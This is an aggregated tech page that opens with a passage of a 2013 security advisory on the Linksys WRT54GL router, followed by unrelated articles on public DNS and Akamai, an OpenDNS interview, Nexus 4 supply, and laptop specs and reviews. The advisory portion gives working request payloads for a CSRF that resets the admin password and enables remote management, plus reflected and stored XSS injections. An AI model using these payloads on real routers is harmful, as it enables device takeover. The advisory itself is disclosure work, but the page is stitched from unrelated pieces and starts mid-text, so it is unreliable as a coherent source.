

POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/Management.asp
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 299

submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd&http_passwdConfirm=pwnd&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

* CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management:

http:///apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&remote_mgt_https=0&http_enable=1&https_enable=0&wait_time=4&need_reboot=0&http_passwd=pwnd1&http_passwdConfirm=pwnd1&_http_enable=1&web_wl_filter=0&remote_management=1&http_wanport=8080&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

* reflected XSS

=> parameter: submit_button

Injecting scripts into the parameter submit_button reveals that this parameter is not properly validated for malicious input.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/reflected-XSS-01.png

POST /apply.cgi HTTP/1.1
Host: 192.168.178.166
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.166/Wireless_Basic.asp
Authorization: Basic xxxx=
Content-Type: application/x-www-form-urlencoded
Content-Length: 155

submit_button=Wireless_Basic'%3balert('pwnd')//&action=Apply&submit_type=&change_action=&next_page=&wl_net_mode=mixed&wl_ssid=test&wl_channel=6&wl_closed=0

* stored XSS (Access Restrictions -> Richtliniennamen eingeben (place the XSS) -> Zusammenfassung (Scriptcode gets executed)

=> parameter: f_name

Injecting scripts into the parameter f_name reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods like CSRF for inserting the malicious JavaScript code.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/stored-XSS-Filters.png

=> Change the request methode from HTTP Post to HTTP GET makes the exploitation easier:


http://192.168.178.166/apply.cgi?submit_button=Filters&change_action=&submit_type=save&action=Apply&blocked_service=&filter_web=&filter_policy=&f_status=0&f_id=1&f_status1=disable&f_name=123">&f_status2=allow&day_all=1&time_all=1&allday=&blocked_service0=None&blocked_service1=None&host0=&host1=&host2=&host3=&url0=&url1=&url2=&url3=&url4=&url5=

============ Solution ============

Upgrade your router to the latest firmware version with fixes for XSS and OS Command Injection vulnerabilities.

Fixed Version: Ver.4.30.16 (Build 2)
Available since 10.01.2013

Download: http://homesupport.cisco.com/en-eu/support/routers/WRT54GL

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-001
Twitter: @s3cur1ty_de

============ Time Line: ============

September 2012 - discovered vulnerability
03.10.2012 - Contacted Linksys and give them detailed vulnerability details
03.10.2012 - Linksys responded with a case number
11.10.2012 - Status update from Linksys
23.10.2012 - Linksys requested to sign the Beta Agreement for testing the Beta Firmware
29.10.2012 - Send the Beta Agreement back
29.10.2012 - Linksys gives access to the new Beta Firmware
30.10.2012 - Checked the new firmware and verified that the discovered XSS and OS Command Injection vulnerabilities are fixed
30.10.2012 - Linksys responded that there is no ETA of the new firmware
17.01.2013 - Linksys informed me about the public release of mostly fixed version (XSS, OS Command Injection fixed)
18.01.2013 - public release
===================== Advisory end =====================



Using OpenDNS/Google DNS is Bad Idea?

Think you're getting faster performance by using Google DNS or OpenDNS? Think again -- especially if you're outside the US.

A post at TUAW today recommends you change your DNS provider for faster performance. If you are located outside the US -- like I am, and like most APC readers are -- this is a bad idea. I only discovered why after experiencing slow download speeds for several months.


Like other tech enthusiasts, I jumped on the opportunity to switch my computer's domain name server settings away from my ISP's defaults to -- I assumed -- the much larger and faster Google DNS servers at 8.8.8.8 and 8.8.4.4 when they were first announced.

If you're not familiar with what exactly DNS servers do, they translate the web address you type into your browser into the actual IP address of the internet server you're connecting to at the other end. For example, a DNS server will convert "apcmag.com" typed into your browser address bar into "125.7.5.1", which is the IP address of our server at Macquarie Telecom's datacentre.

DNS servers can be one cause (among many) of slowness in your web browsing, if your ISP's DNS server is overloaded and responding slowly -- you may experience a delay of seconds each time you go to a web address that your computer hasn't seen recently (and therefore has to connect to a DNS server to find out the correlating IP address).

This is one of the problems that third-party public DNS providers like Google DNS and OpenDNS are supposed to fix -- faster, more reliable lookups.

However, it was Simon Hackett, CEO of Internode, who I bumped into at a function who warned me off using third party DNS servers located overseas, such as Google DNS or OpenDNS. (By the way, if I've got any of the technical details wrong in this article, it's much more likely to be my fault than Simon's...!)

The key reason they're bad is that they stuff up your computer's ability to find the closest Akamai server to you. Akamai is the worldwide system which places massive file servers inside ISP data centres worldwide -- so that when you download a big file like a Windows or Mac OS X update, or a TV show or movie from iTunes, it downloads from a server that's very close to you, and therefore pumps down your line as fast as your ADSL2+ can handle. (The primary selling point of Akamai is that it avoids server overload when everyone tries to download something at once, but a secondary selling point is that you're downloading a file from a local server inside your ISP or at least in your country, so that the trip between the file server and you is as short/fast as possible.)

If you use a US-based DNS server, your closest Akamai cache will instead be chosen as being in the US, and you'll get crummy download speeds as your file trickles over the international link.

In my case, this meant that iTunes downloads were coming down at a couple of hundred kilobytes per second, rather than the 1.9MB/s I was accustomed to before I changed my DNS servers to Google DNS and OpenDNS.

Don't get me wrong -- there are some distinct advantages to using reliable servers from companies that specialise in providing DNS, like much faster refresh of their DNS records when new domains are registered, or websites change their IP addresses, DNS-level blocking of known phishing sites and so on.

But when they claim you'll get faster speed by using them, they're conveniently forgetting to mention that if you're not located in the US, they could badly slow down your speed when downloading from distributed caches like Akamai.

Admittedly, part of the problem is the design of Akamai -- it is, to an extent, a 'hack' of the DNS system (not in the illegal sense; but in the sense that they're using the DNS system in a way it was not quite designed for initially.) I have contacted Akamai's senior PR people twice and asked if they're investigating any way of mitigating the problem when people use DNS servers outside their local geography, but I haven't heard back.

Of course, if Google DNS, OpenDNS or other public DNS providers put servers into Australia, the problem would be largely gone. But until they do, my advice is to stick with the DNS provided by your ISP. To their credit, OpenDNS is reasonably up-front about this problem (though it's not something they advertise on their homepage, so most users wouldn't be aware of it.)

UPDATE: Phil Sweeney from Whirlpool reminded me that using a third-party DNS service can also screw up your ISP's quota free downloads. For example, iiNet provides unmetered downloads from Apple's iTunes Store, which is great if you like to buy TV series and rent/buy movies on iTunes. However, if you change your DNS to OpenDNS or Google DNS, you'll be pulling the content from an Akamai server overseas, rather than the one in iiNet's network that is designated for free downloads. As a result, you will be charged for those downloads. - source

IdeaPad Yoga 13 Specs


Specification:

Description Yoga 13
CPU
  • 3rd generation Intel® Core™ i7-3517U
  • 3rd generation Intel® Core™ i5-3317U
  • 3rd generation Intel® Core™ i3-3217U
Operating System
  • Windows 8 Pro
  • Windows 8
Memory
  • 4GB, 8GB DDR3
Graphics
  • Intel® HD Graphics 4000 (integrated)
Dimensions
  • 333.4 x 224.8 x 16.9 mm (13.1 x 8.9 x 0.67")
Camera
  • 1.0MP 720p HD integrated webcam
Display
  • 13.3" HD+IPS capacitive multitouch display (16:9 widescreen) (1600x900)
Weight
  • 1.54 kg (3.4 lbs)
I/O Ports
  • 1 USB 2.0 port
  • 1 USB 3.0 port
  • Combo jack
  • HDMI
  • 2-in-1 card reader (SD/MMC)
Storage
  • 128GB SSD (256GB coming soon)
Wireless Connectivity
  • 802.11 b/g/n wireless
  • Bluetooth®
Keyboard
  • AccuType keyboard
Battery Life
  • 8 hours
Security Features
  • OneKey® Recovery

Google Public DNS A Closer View

Earlier this month, Google announced that it had become the largest public DNS service in the world, handling an average of more than 70 billion requests a day. From Google’s point of view, this was great. As it pointed out in its official blog, a good DNS service helps make the Web faster and more secure. That’s true. But is a giant DNS in Google’s hands really good for the world?


The DNS or Domain Name System is often described as the “phone book” of the Internet, but that analogy tends to understate its importance. Imagine that you’ve suddenly landed in the middle of a giant megalopolis without any street names or building addresses or distinguishing characteristics and no working GPS. That would be the Internet without a domain name system.

But while the DNS system is criticial for planetary communications, helping to run it typically hasn’t brought anyone power or glory. This led to a certain amount of neglect, which in turn created a business opportunity for companies willing to tackle the job of improving DNS.

Three years ago, I sat down with David Ulevitch, a developer who founded OpenDNS in 2005 to help make the Internet faster and more reliable for individuals and businesses by providing a better domain name service. At the time, OpenDNS had built a small but profitable business providing improved DNS for free to individuals and for a fee to enterprises. It later grew to operate the largest network of public DNS servers, serving millions of users around the world.

Unlike Google, Ulevitch has never struck me as being obsessed with world domination, so I reached out to him this week to ask what he thought of Google’s entry, and now colossal presence, in the space.

What are the implications of Google being the largest public DNS service? Is this good for ordinary people who use the Internet?

First, I think it’s a clear indication that Google takes DNS seriously. I’ve always said that Google’s purview is limited to everything between the user and the advertisement. DNS fits squarely within those sights and cuts across a number of strategic areas of focus for Google—speed, security, analytics and control. I think efforts to make the Internet faster is good for ordinary people, but I think that there’s more to Google’s motives then pure benevolence. That’s not to say good can’t be a byproduct, but rather, there are ancillary benefits that may not be as friendly to the ordinary Internet user.

With DNS, it’s possible to control key components of Internet navigation. Google already controls search, they are quickly gaining market share to control the browser, and when you put in DNS, it becomes the trifecta of complete navigational control. The “omnibox” is something Google introduced with Chrome, but I actually introduced it to Google PM Sundar Pichai a number of years before Chrome existed when demoing our vision for OpenDNS to him as he was then the PM for Google Toolbar, and other Google desktop products.

What role has Google played in the DNS ecosystem? Do you see them as a competitor or a partner?

Google has helped raise the importance of DNS above the network engineering community, which has been really good. They’ve also worked with us to advance the state of the art for DNS performance, something we’ve really enjoyed working with them to make happen. It’s not so much competition as it is choice in the market. If they started defaulting Chrome to use Google DNS, I think that’s something we would take issue with, but for now, we like the idea of people using a DNS other than their ISPs, that’s a good idea for a lot of reasons.

What are some of those reasons?

I like the idea of separation of services. ISPs provide a pipe. Other vendors provide security. Other vendors provide email. When one party controls all the services, it’s a “synergy” for the company, but rarely for the consumer. With DNS in particular, there are performance and security benefits that third party DNS providers offer that ISPs aren’t incentivized to do since DNS is a cost-center for them, and a profit-center for us.

Are there any privacy concerns to think about if you configure your network settings to use Google Public DNS?

You are trusting them with all your DNS lookup data, which can be more personal and revealing than I think most people realize. We don’t persist logs for our users without accounts and configured networks, I’m not sure Google makes the same statement. They have a separate privacy policy for Google DNS, and I’m sure they are hypersensitive about privacy concerns, so I wouldn’t be too paranoid.

If an ordinary person using the Web doesn’t make this change, would they have any exposure to Google Public DNS?

Probably not. OpenDNS is in 10′s of 1000′s of public hotspots, retail stores, schools, and businesses. so people often find our service. I’m not sure about Google DNS in that capacity.

If Google is the largest public DNS, who is the largest private DNS?

An ISP—maybe Comcast? I’m not sure. Google claims the most number of queries per day, but we actively discourage automated usage of OpenDNS by machines, crawlers and other software. Google doesn’t. I’m not sure they have more end users than we have. We are still growing at an aggressive clip.

Anonymous has publicly posted its threat to take down the Internet on March 31 by attacking the 13 DNS root servers of the Internet. Do you take this threat seriously?

Anonymous is nothing and everything at the same time. While I think it’d be very difficult to take down the root servers on the Internet, I think it’s entirely possible to cause massive disruption to the Internet in other ways if someone was focused on doing that. The Internet is always getting more secure, and more diversely connected, but there are some weak links still where a specific outage in a specific place would have far-reaching disruptive implications.

Does the presence of players like OpenDNS and Google Public DNS make the Internet more stable?

I think anything which promotes heterogeneity on the Internet promotes stability. Diversity in services, service providers, and separating the layers of the networking stack are all important. Your ISP no longer provides you email because everyone either uses their own or has an account with Hotmail, Gmail or Yahoo mail. The same way people unbundled their email from their ISP, I think they should do with their DNS. Separation of services has been a long-standing best practice in the security community, and it applies now more than ever. In that vein, I’ll reiterate my view that I think Google controlling search, the browser, and the network or DNS layer is a dangerous trifecta that the consumer will probably be best served avoiding. I’m sure we’ll find out soon enough. - source

LG: Google Nexus 4 at $200 Limited Supply

Google made a bold move late last year by announcing its flagship Nexus smartphone for an unsubsidized price starting at $300. That's a big deal when comparable devices are selling for twice as much and the upfront cost for most last generation phones with a two year contract is only slightly cheaper at $200. But ultimately Google failed to deliver -- both figuratively and literally -- as it missed shipping deadlines and had to pull the device from sale due to problems with supplies.


Last month, the company pinned the blame on "scarce and erratic" supplies from manufacturer LG, while also admitting that their communication had been flawed.

But LG has a different story to tell. In an interview with French website Challenges, Cathy Robin, director LG Mobile France said they built precisely the number of phones that Google requested, it's just that the Internet giant's sales forecasts were wildly inaccurate. Estimates were based on sales of the Samsung-made Galaxy Nexus, which meant there were too few handsets available and too many shipped to the wrong regions.

Robin noted that despite the setbacks, the partnership between Google and LG is still going well, and in fact they expect to ramp up production of the Nexus 4 by mid-February to address the shortage.

Last week, LG's senior vice president James Fisher also said that the Nexus 4 was "the first of many" products the Korean firm had planned with Google, sparking rumors that the firm could be in charge of its successor. - source

Lenovo ThinkPad X230 Review


September 19, 2012: The ThinkPad is to personal computing what polka dots are to fashion – it’s a classic. Originally an IBM product, and taken over by Lenovo about seven years ago, the concept and construct of a ThinkPad has changed little over the years. The Japanese Bento-box inspired design remains largely unchanged with tweaks made only to improve ergonomics or adapt to new screen sizes.

Design details

We got our hands on one of the new-age ThinkPads, the Lenovo X230. While retaining its executive-like all-black look, this ThinkPad is designed to be lightweight and compact to meet the needs of an increasingly mobile lifestyle.


In a market where thinner is apparently better, the 1-inch plus girth of the Lenovo X230 seems like an aberration. However, Lenovo manages to pack all of it in about 1.5 kgs, an easily portable bulk. The build quality is sturdy with a magnesium roll cage housing the tech inside and a soft rubberised panel on the body which keeps scratches away.

The 12.5-inch screen is an IPS display, which means readability/visibility was excellent at all times. The viewing angles too were better than the usual fare. We watched ‘Before Sunrise’, the 1995 romantic classic and although we had to use it with external speakers, the video experience was quite good.


The creators of the ThinkPad, and the engineers who have carried the company’s legacy on, have always paid an uncommon amount of attention to the device’s keypad. Although it’s one of the most used components of any personal computing device, users seldom prioritise a genuinely ergonomic keypad over more aesthetic features when going for a laptop. However, for someone who hasn’t used a ThinkPad keyboard before, the typing hardware is quite a pleasant revelation. The island – type keyboard seems to have been spaced at just the right distance, with the keyboard depressed just a little bit so your finger’s natural curve find the right fit every time you hit a key.

The space bar also doubled up as a function key for an overhead lamp that highlights the keyboard. A simple addition but extremely useful considering how many times we fumble around in the dark when trying to tweak volume or pause in the middle of a movie we might be watching before going off to bed.

Targeted at the business traveller, the X230 has been made ready for video and voice conferencing with a dual-array noise cancelling microphone that keeps ambient noise at a minimum. During conference calls or video chats, you can even choose to mute the sound of keys being typed on your keyboard for a clearer conversation. The webcam is a high-definition 720p HD camera which has face tracking enabled.

A device which aimed at the business traveller needs to be equipped with the latest connectivity options. The ThinkPad X230 hence comes with three USB ports (2 x USB 3.0), a memory card reader, Gigabit Ethernet port, VGA and Mini DisplayPort outputs and an Express Card slot.

Multimedia


The ThinkPad X230 is equipped with Dolby speakers with Advanced Audio v2. However, the audio experience on the laptop was definitely not one of the best we’ve come across. Most times the volume on the speakers was too feeble and the audio had little impact. Hence, we inevitably had to plug in the headphones while watching a movie or sitcom.

Our ThinkPad X230 review unit operates on Microsoft Windows 7 Professional and is powered by an Intel Core i5 3210M with an over clocking speed of 2.5GHz.

We ran our regular Novabench test on the Lenovo X230 and it scored about 676 points shooting way ahead of a bunch of Ultrabooks and laptops we had reviewed in the last couple of months, including the Dell Inspiron 17R Special Edition and the Acer Aspire TimelineUltra M5; the only exception being the Dell XPS 14z which we reviewed earlier this year.

Like most other manufacturers there’s a bit of bloatware that comes with Lenovo ThinkPad X230, the only good thing is you might actually be able to use this software regularly. You’ll find programs such as Evernote, Google Chrome, Skype etc on board already. With the screen dimmed and constant Wi-Fi connectivity the Lenovo ThinkPad X230 gave us close to six hours of email and media usage.

Crafted as a modern, compact device to be carried along for presentations or business trips, the Lenovo ThinkPad X230 does the job efficiently. For those who might want to replace say an older version of a ThinkPad, the X230 is a decent option, unless you are saving up for slimmer devices such as the Carbon X1. For those who are considering buying their first ThinkPad, the X230 competes well when it comes to productivity with its competitors in the market. - source